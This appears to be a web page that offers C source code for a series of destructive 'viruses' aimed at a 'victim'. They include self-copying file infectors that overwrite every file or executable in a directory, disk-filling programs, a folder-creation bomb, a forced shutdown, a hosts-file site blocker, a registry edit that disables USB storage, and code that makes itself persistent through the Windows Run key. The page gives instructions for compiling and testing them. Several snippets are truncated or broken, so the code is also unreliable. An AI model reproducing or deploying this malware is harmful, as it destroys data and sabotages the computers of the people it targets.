Infection with intenal copy virus in c lang.
This virus when executed will infect all file on current directory of the computer on which it is run.
Source code of the virus
/* VIRUS BY GAURAV GUPTA*/
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
done = findfirst("*.*",&ffblk,0);
while (!done)
{ cprintf(" %s ", ffblk.ff_name);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
library used in above virus :-
stdio.h
dos.h
dir.h
fcntl.h
conio.h
_____________________________________________________________________
Shutdown virus in c lang.
This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll shutdown the system.
Source code of the virus
#include
#include
void main(void)
{
system("shutdown -s");
}
_____________________________________________________________________
Unlimited folder creater virus in c lang.
This virus when executed will create unlimited folder in current path of the computer on which it is run.
Source code of the virus
#include
#include
void main()
{
char s[14]="md "; int man,i,j,k,l,m,n,o,p,q,r;
for(man=1;man<=10;man++)
{
for(i=65;i<122;i++)
{
s[3]=i;
s[4]=0;
if(man==1)
{
system(s);
continue;
}
for(j=65;j<122;j++)
{
s[4]=j;
s[5]=0;
if(man==2)
{
system(s);
continue;
}
for(k=65;k<122;k++)
{
s[5]=k;
s[6]=0;
if(man==3)
{
system(s);
continue;
}
for(l=65;l<122;l++)
{
s[6]=l;
s[7]=0;
if(man==4)
{
system(s);
continue;
}
for(m=65;m<122;m++)
{
s[7]=m;
s[8]=0;
if(man==5)
{
system(s);
continue;
}
for(n=65;n<122;n++)
{
s[8]=n;
s[9]=0;
if(man==6)
{
system(s);
continue;
}
for(o=65;o<122;o++)
{
s[9]=o;
s[10]=0;
if(man==7)
{
system(s);
continue;
}
for(p=65;p<122;p++)
{
s[10]=p;
s[11]=0;
if(man==8)
{
system(s);
continue;
}
for(q=65;q<122;q++)
{
s[11]=q;
s[12]=0;
if(man==9)
{
system(s);
continue;
}
for(r=65;r<122;r++)
{
s[12]=r;
s[13]=0;
if(man==10)
{
system(s);
continue;
}
}
}
}
}
}
}
}
}
}
}
}
}
_____________________________________________________________________
Websites blocker virus in c lang.
You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking.
This virus need’s to be clicked only once by the victim. Once it is
clicked, it’ll block a list of websites that has been specified in the
source code. The victim will never be able to surf those websites unless
he re-install’s the operating system.
Source code of the virus
#include
#include
#include
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
_____________________________________________________________________
Space eater virus in c lang.
This virus when executed will eat up the hard disk space on the root
drive (The drive on which Windows is installed, usually C: Drive) of the
computer on which it is run. Also this Trojan works pretty quickly and
is capable of eating up approximately 1 GB of hard disk space for every
minute it is run. So, I’ll call this as Space Eater virus.
Source code of the virus
/* SPACE EATER VIRUS BY GAURAV GUPTA*/
#include
#include
#include
#include
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]=" ",choice;
void eatspace(void);
void findroot(void);
void showstatus(void);
void draw(void);
void accept(void);
void main()
{
draw();
delline();
findroot();
}
void draw()
{
clrscr();
}
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
eatspace();
}
}
if(t==NULL)
{
getch();
exit(1);
}
exit(1);
}
void eatspace()
{
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
vir_count=random(120);
draw();
break;
}
}
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
_____________________________________________________________________
space eater-2 virus in c lang.
This virus when executed will eat up the hard disk space on the current
drive of the computer on which it is run. I’ll call this as Space
Eater-2 virus.
Source code of the virus
/* SPACE EATER-2 VIRUS BY GAURAV GUPTA*/
#include
#include
void main()
{
while(1)
{
system("dir>>╚a.exe");
}
}
_____________________________
Disable USB ports virus in c lang.
It disables/blocks the USB ports on the computer (PC). Anyone with a
basic knowledge of C language should be able to understand the working
of this virus program. Once this virus is executed it will immediately
disable all the USB ports on the computer. As a result the you’ll will
not be able to use your pen drive or any other USB peripheral on the
computer.
source code
.#include
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}
You need to compile them before you can run it.
Upon compilation of block_usb.c you get block_usb.exe which is a simple
virus that will block (disable) all the USB ports on the computer upon
execution .
To test this virus, just run the block_usb.exe file and insert a USB pen
drive. Now you can see that your pen drive will never get detected .
_______________________________________________________________________________
FILE Overwrite virus-
source code
If you are interested then here is a code you can use to overwrite files in a system
#include
#include
#include
#define V_SIZE 7424
int n_inf=0;
void resume(void);
void inf(char *vir, char *filename);
int compare(char *d, char *e);
void main(int argc, char **argv)
{
struct ffblk fileinfo;
char vir[V_SIZE];
FILE *fp;
char path[6];
int b,a=0;
argc++;
if((fp=fopen(argv[0],"rb"))==NULL) resume();
fread(vir,sizeof(char),V_SIZE,fp);
fclose(fp);
path[0]='*';
path[1]='.';
path[2]='E';
path[3]='X';
path[4]='E';
path[5]=NULL;
if(findfirst(path,&fileinfo,FA_ARCH)==-1) resume();
inf(vir,fileinfo.ff_name);
do {
if(findnext(&fileinfo)!=0) a=1;
else inf(vir,fileinfo.ff_name);
if((a==1) || (n_inf>4)) b=1;
} while (b!=1);
resume();
}
void inf(char *vir, char *filename)
{
FILE *fp;
char checkinf[V_SIZE];
if((fp=fopen(filename,"rb+"))==NULL) resume();
fread(checkinf,sizeof(char),V_SIZE,fp);
if(compare(vir,checkinf)==0) return;
fseek(fp,0L,SEEK_SET);
fwrite(vir,sizeof(char),V_SIZE,fp);
fclose(fp);
n_inf++;
}
int compare(char *d, char *e)
{
int a;
for(a=0;a
return(0);
}
void resume(void)
{
exit(0);
}
_____________________________________________________________
Infection through IP-
source code
#include
#include
#include
nippy virus-
source code
#include
#pragma comment(lib,"user32")
#pragma comment(lib,"shell32")
LPDWORD br,bw;
HGLOBAL Vir;
LPVOID VirBlock;
int virsize;
char virname[MAX_PATH];
char hostname[MAX_PATH];
HINSTANCE kernel;
FARPROC FileOpen,FileRead,FileWrite,FileClose,SetPointer;
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
WIN32_FIND_DATA fdata;
HANDLE hfile;
int fcount=1,no_more_files=1;
kernel=LoadLibrary("kernel32.dll");
FileOpen=GetProcAddress(kernel,"CreateFileA");
FileRead=GetProcAddress(kernel,"ReadFile");
FileWrite=GetProcAddress(kernel,"WriteFile");
FileClose=GetProcAddress(kernel,"CloseHandle");
SetPointer=GetProcAddress(kernel,"SetFilePointer");
Payload();
GetModuleFileName(NULL,virname,sizeof(virname));
virsize=GetCompressedFileSize(virname,NULL);
Vir=GlobalAlloc(GMEM_MOVEABLE,virsize);
VirBlock=GlobalLock(Vir);
hfile=CreateFile(virname,GENERIC_READ,
FILE_SHARE_READ,
0,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0);
FileRead(hfile,VirBlock,virsize,&br,0);
FileClose(hfile);
hfile=FindFirstFile("*.*",&fdata);
while((no_more_files!=0) && (fcount!=5)){
no_more_files=FindNextFile(hfile,&fdata);
if(FindExecutable(fdata.cFileName,0,hostname)>32){
if(isinfected(hostname)==FALSE){
infect_file(hostname);
fcount+=1;
}
}
}
return 0;
}
int infect_file(LPSTR host){
HANDLE hh;
int sz;
hh=FileOpen(host,GENERIC_WRITE+GENERIC_READ,
FILE_SHARE_WRITE+FILE_SHARE_READ,
0,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0);
sz=(int)GetCompressedFileSize(host,NULL);
SetPointer(hh,0,0,FILE_BEGIN);
FileWrite(hh,VirBlock,virsize,&bw,0);
SetPointer(hh,0,0,FILE_END);
FileWrite(hh,"NIPPY",5,&bw,0);
FileClose(hh);
return 0;
}
int Payload(){
MessageBox(NULL,"NIPPY\n\nWIRTTEN BY MOAPHIE\F-13 LABS","Nippy",MB_OK);
return 0;
}
BOOL isinfected(LPSTR host){
int sz;
LPDWORD br2;
HANDLE hi;
BYTE mark[5];
hi=FileOpen(host,GENERIC_READ+GENERIC_WRITE,
FILE_SHARE_READ+FILE_SHARE_WRITE,
0,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
0);
sz=(int)GetCompressedFileSize(host,NULL);
SetPointer(hi,(sz-5),0,FILE_BEGIN);
FileRead(hi,mark,5,&br2,0);
mark[5]='\0';
if(lstrcmp(mark,"NIPPY")==0)
return TRUE;
else
return FALSE;
FileClose(hi);
}
_____________________________________________________________-
Other virus-
source code
#include windows.h
#include string.h
char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char pathname[256];
HKEY hKey;
GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);
strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);
unsigned char reg[10] = "infected";
RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);
}
________________________________________________________
source code
#include windows.h
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,”\\virus.exe”);
CopyFile(pathtofile,system,false);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
HWND hWin;
hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);
while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}
return 0;
}
____________________________________________________